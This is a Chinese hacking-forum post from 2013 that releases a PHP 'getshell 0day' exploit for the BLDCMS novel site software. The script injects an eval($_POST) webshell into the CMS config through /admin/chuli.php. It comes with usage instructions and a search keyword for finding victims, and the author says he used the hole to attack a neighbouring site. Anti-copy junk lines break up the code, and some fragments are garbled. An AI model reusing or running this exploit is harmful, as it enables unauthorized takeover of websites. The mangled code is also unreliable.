中国网络渗透测试联盟
标题:
BLDCMS(白老大小说) Getshell 0day EXP
[打印本页]
作者:
admin
时间:
2013-3-26 20:49
标题:
BLDCMS(白老大小说) Getshell 0day EXP
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
' `/ ^- u1 I: f' J1 m3 L
! S! J" I& }2 T7 T7 |! l
) [/ r( w- }9 b2 e @. z0 J4 u* G
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
2 N6 F4 T' J8 k. ^8 ?" O
% _, f3 `4 W# R4 g
既然都有人发了 我就把我之前写好的EXP放出来吧
4 j5 s, B% l" Y3 k/ L% e# K" I
$ E, t3 H$ \) A4 O/ T7 V& ~" i) j
view source print?01.php;">
9 E$ g. s5 Z3 }; b2 Q2 a& B
02.<!--?php
/ ^1 \/ X1 C3 L) f x
03.echo "-------------------------------------------------------------------
; |1 g' N2 w2 Q
04.
u) L8 M5 x6 G( B
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
8 W1 T: l8 z" K* \3 _
06.
# |+ o& [0 D) s& T- b- L. S" z
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
9 q, C8 @' k' _( {
08.
8 B( c0 c0 Q- K
09.QQ:981009941\r\n 2013.3.21\r\n
1 |( i* m2 l- d" C6 y7 L
10.
5 R" N6 A* K5 y X1 ]( A3 [
11.
$ J/ Y0 i9 S) t& t! [# m' e
12.用法:php.exe EXP.php
www.baidu.com
/cms/ pass(一句话密码
/ c7 Q% Z* g" V, ]! ^, W0 K, x
13.
% x) o$ X, j2 r! S9 y4 F
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
# u3 u$ o( G/ T0 s+ o( @) y$ I+ e
15.
# R& G: N% z: L3 ^$ T8 @
16.--------------------------------------------------------------------\r\n";
# ~. v* T8 ?- m5 J7 p' M' u
17.$url=$argv[1];
* m# x, [, v* ]3 @0 }) U: k
18.$dir=$argv[2];
$ w, f8 p" ]$ K5 @1 r- O3 {
19.$pass=$argv[3];
0 D. t+ }: L3 o
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
; D2 w% q# O) B
21.if (emptyempty($pass)||emptyempty($url))
7 d/ g1 p. l, c5 m% H6 h
22.{exit("请输入参数");}
2 m, a# B* e6 s" H1 V
23.else
+ s/ _7 D9 E, Z/ K1 b) L1 U
24.{
" W0 W: X. \$ W2 [. P
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
6 m% T. x" m, U1 s8 g
26.
& c0 ^% O! N. W2 r, `# I; y
27.al;
0 M3 c8 S! p/ x& i- b8 X- c
28.$length = strlen($fuckdata);
; [. V- T4 E5 n: l8 n! R9 c
29.function getshell($url,$pass)
0 l& x4 X9 g3 i4 W# T# A
30.{
& p( B3 \! E7 \( d
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
' D; X% N: O3 S8 F
32.$header = "
OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
2 c; ]8 _0 w7 z r
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
9 \ e5 I5 ?" \9 v+ J6 N
34.$header .= "User-Agent: MSIE\r\n";
) H, ^! ^: H% _: H8 l5 Z7 G- L/ N; X( u
35.$header .= "Host:".$url."\r\n";
( e+ x& j e( ]3 z) G
36.$header .= "Content-Length: ".$length."\r\n";
/ w T/ P1 I4 L
37.$header .= "Connection: Close\r\n";
) j% D8 G% `( k+ g( g* S
38.$header .="\r\n";
4 L: {/ b. @/ P( z0 e; F
39.$header .= $fuckdata."\r\n\r\n";
# `1 o' W$ Q1 s/ b
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
! s+ V0 `5 R, Y5 `' n
41.if (!$fp)
% g- p0 W5 W* H0 Z7 d
42.{
- R. P n; ~) j
43.exit ("利用失败:请检查指定目标是否能正常打开");
: T, L0 a- R* k
44.}
2 x( M4 f) F* B
45.else{ if (!fputs($fp,$header))
, Y x+ p! |. j6 N- E) e: ~
46.{exit ("利用失败");}
. |- h" h2 V, g6 l5 Z7 ^0 _5 }
47.else
* r9 e! a( H; w7 Q; ]6 i
48.{
. d* u6 [& ~( y+ N
49.$receive = '';
5 ^$ U6 j" y0 O8 J% E
50.while (!feof($fp)) {
# \. G" ?% C9 L- d
51.$receive .= @fgets($fp, 1000);
8 o( k7 F8 C; @4 F4 `: H
52.}
1 t5 |8 T# O% I- Q
53.@fclose($fp);
) g/ A, W( ` U/ x7 k7 }+ v
54.echo "$url/$dir/conn/config/normal2.php pass
pass(如连接失败 请检查目标
) L0 O9 ~1 I, k6 ~+ p
55.
9 H- H2 ]+ A! ^) v
56.GPC是否=off)";
5 ^: I; H: W J) ~4 Y& ^
57.}}
4 N+ }: R& P- G& e3 Z3 | a7 o
58.}
0 L/ W i! z. ?, W
59.}
, U: f) e- f4 A( e9 l- [& ^
60.getshell($url,$pass);
9 d3 x7 t- _6 ~. E+ Z+ V
61.?-->
% l/ J1 u5 L6 j/ N! e5 N
; B1 \5 M* V9 U" ?
* O5 U% _( `' m# q4 D, `0 R9 w
- N& N5 N4 D8 U- w
by 数据流
; C. d- e) a2 M3 q! T: P. p/ t9 S
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2